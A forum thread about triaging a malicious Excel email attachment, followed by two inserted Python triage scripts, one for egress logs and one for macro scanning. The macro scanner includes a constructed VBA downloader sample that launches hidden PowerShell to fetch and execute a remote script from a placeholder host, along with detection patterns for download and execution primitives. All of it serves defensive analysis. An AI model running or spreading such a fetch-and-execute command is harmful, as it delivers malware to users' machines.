Excel Email Virus Damage Control

Discussion in 'Networking & Security' started by mr_zen256, May 7, 2018.

  1. mr_zen256

    Hi all - A work colleague has inadvertently opened a malicious Excel email document and I am trying to gauge what kind of damage may have been caused and any further measures we need to take. The colleague has already had a good grilling and a crash course in email security 101.

    When they opened the file, Excel listed documents and files on the person's PC. I didn't get a chance to see this document while it was open, so I am unable to elaborate on that further.

    We have scanned the file locally with Malwarebytes and it didn't report any threats. When uploading the document to virustotal.com, only 1 of 59 engines reported a threat: "UDS: DangerousObject.Multi.Generic".

    Any suggestions on how to determine what data / info may have been breached?
     
  2. Vengance_01

    Pull the drive and then put it into a machine that is isolated from the network so you can do some testing without worry.
     
  3. Dead Parrot

    If you have an edge security device, pull logs and see if that workstation sent data offsite. If data was sent out of the building, depending on the data on that person's PC, you may have to file a data breach report with the local authorities and contact your insurance company about setting up identity monitoring services for customers whose data was sent out.

    If you got lucky and nothing left the building, count your blessings and then ask why the email scanner didn't pick up and terminate the malicious document.
     
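As an added example (not part of the thread and not any poster's code), here is a small Python triage script for the step described above: pull the edge/firewall logs and check whether the workstation sent data offsite. The log column layout (timestamp,src_ip,dst_ip,dst_port,bytes_out), the sample lines, the workstation address 10.0.5.23, the internal ranges and the 1 MB alert threshold are all constructed assumptions; a real export from a firewall or proxy needs its own parser, and the threshold should be tuned to what that workstation normally sends.

```python
import ipaddress

# Constructed sample egress log (not from any real device). Columns are an
# assumption: timestamp,src_ip,dst_ip,dst_port,bytes_out
SAMPLE_LOG = """\
2018-05-07T09:12:01,10.0.5.23,10.0.0.10,445,4096
2018-05-07T09:12:40,10.0.5.23,203.0.113.45,443,1830211
2018-05-07T09:13:02,10.0.5.23,198.51.100.7,8080,52
2018-05-07T09:13:09,10.0.5.24,203.0.113.45,443,900
2018-05-07T09:14:30,10.0.5.23,203.0.113.45,443,2210034
"""

# Assumed internal address space: RFC 1918 plus loopback and link-local.
# Checked explicitly rather than via ipaddress.is_private, because that flag
# also covers documentation ranges such as 203.0.113.0/24 used in the sample.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]


def is_internal(ip):
    """True if the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Split one log line into a record; raises ValueError on a malformed line."""
    ts, src, dst, port, nbytes = line.strip().split(",")
    return {"ts": ts, "src": src, "dst": dst, "port": int(port), "bytes": int(nbytes)}


def egress_summary(log_text, workstation_ip):
    """Aggregate outbound bytes per (external destination, port) for one host.

    Internal-to-internal flows are skipped; only traffic that actually left
    the building is counted. Returns a dict keyed by (dst_ip, dst_port).
    """
    totals = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["src"] != workstation_ip or is_internal(rec["dst"]):
            continue
        key = (rec["dst"], rec["port"])
        entry = totals.setdefault(
            key, {"bytes": 0, "flows": 0, "first": rec["ts"], "last": rec["ts"]})
        entry["bytes"] += rec["bytes"]
        entry["flows"] += 1
        entry["last"] = rec["ts"]
    return totals


def flag_suspicious(summary, threshold_bytes=1_000_000):
    """Destinations that received at least threshold_bytes from the host."""
    return sorted(k for k, v in summary.items() if v["bytes"] >= threshold_bytes)


if __name__ == "__main__":
    summary = egress_summary(SAMPLE_LOG, "10.0.5.23")
    for (dst, port), v in sorted(summary.items()):
        print(f"{dst}:{port} flows={v['flows']} bytes={v['bytes']} "
              f"first={v['first']} last={v['last']}")
    print("review:", flag_suspicious(summary))
```

The per-destination totals are what matter for the breach question: a few kilobytes to a beacon is a different conversation from several megabytes to one external host in a two-minute window, and the first/last timestamps bound the window to pull full packet captures or proxy logs for.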
  4. mr_zen256

    After further investigation, it looks like the Excel script was a downloader. Thankfully the script was not triggered so no malware was able to infect the workstation. I would like to think that Malwarebytes would have blocked it if it had managed to run.

    Definitely a close shave.
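As an added example, not from the thread and not the attachment discussed in it, here is the kind of static check that backs up an "it was a downloader" conclusion: scanning the extracted VBA source for auto-execute triggers, download and execution primitives, evasion flags and embedded URLs, then combining them into a verdict. In practice the VBA text would come from a macro extractor such as olevba (from oletools) run on the isolated copy; the two macro samples below are constructed for illustration, and the indicator lists are assumptions that a real triage would extend.

```python
import re

# Constructed VBA source standing in for what a macro extractor would return.
# It is an assumption for illustration, not the macro from the thread.
SAMPLE_DOWNLOADER = '''
Sub Workbook_Open()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -nop -w hidden -c ""IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')""", 0
End Sub
'''

# Constructed benign macro for contrast.
SAMPLE_BENIGN = '''
Sub FormatReport()
    Range("A1:D20").Font.Bold = True
    ActiveSheet.Columns.AutoFit
End Sub
'''

# Indicator patterns (assumed, non-exhaustive): procedures that run on open,
# network fetch primitives, process-launch primitives, and hiding/obfuscation.
AUTOEXEC = re.compile(
    r"\bSub\s+(Workbook_Open|Auto_Open|Document_Open|Workbook_Activate|AutoOpen)\b", re.I)
DOWNLOAD = re.compile(
    r"(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|Net\.WebClient"
    r"|DownloadString|DownloadFile|Invoke-WebRequest|BitsTransfer)", re.I)
EXEC = re.compile(
    r"(WScript\.Shell|\bShell\s*\(|\.Run\b|\.Exec\b|powershell|cmd(?:\.exe)?\s"
    r"|rundll32|regsvr32|mshta)", re.I)
EVASION = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-nop\b|-enc\b|\bIEX\b|Invoke-Expression"
    r"|Chr\s*\(|StrReverse)", re.I)
URL = re.compile(r"""https?://[^\s'"()<>]+""", re.I)


def triage_vba(vba_source):
    """Return the indicators found in one macro module plus a verdict.

    Verdict logic: an auto-execute trigger plus a fetch (primitive or URL)
    plus a process launch is the classic downloader shape; either half on its
    own is only 'suspicious'; nothing found means no downloader indicators.
    """
    findings = {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(vba_source)}),
        "download": sorted({m.group(1) for m in DOWNLOAD.finditer(vba_source)}),
        "execute": sorted({m.group(1).strip() for m in EXEC.finditer(vba_source)}),
        "evasion": sorted({m.group(1).strip() for m in EVASION.finditer(vba_source)}),
        "urls": sorted(set(URL.findall(vba_source))),
    }
    fetches = bool(findings["download"] or findings["urls"])
    if findings["autoexec"] and fetches and findings["execute"]:
        verdict = "likely downloader"
    elif fetches or findings["execute"]:
        verdict = "suspicious"
    else:
        verdict = "no downloader indicators"
    findings["verdict"] = verdict
    return findings


if __name__ == "__main__":
    for name, src in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        result = triage_vba(src)
        print(f"== {name}: {result['verdict']}")
        for k in ("autoexec", "download", "execute", "evasion", "urls"):
            if result[k]:
                print(f"  {k}: {result[k]}")
```

The URLs and the process-launch line are the two outputs worth carrying forward: the URLs go straight into the egress log search for the workstation, and the launch command tells you which child process (here powershell.exe under EXCEL.EXE) to look for in endpoint or Sysmon logs to confirm whether the script really never ran.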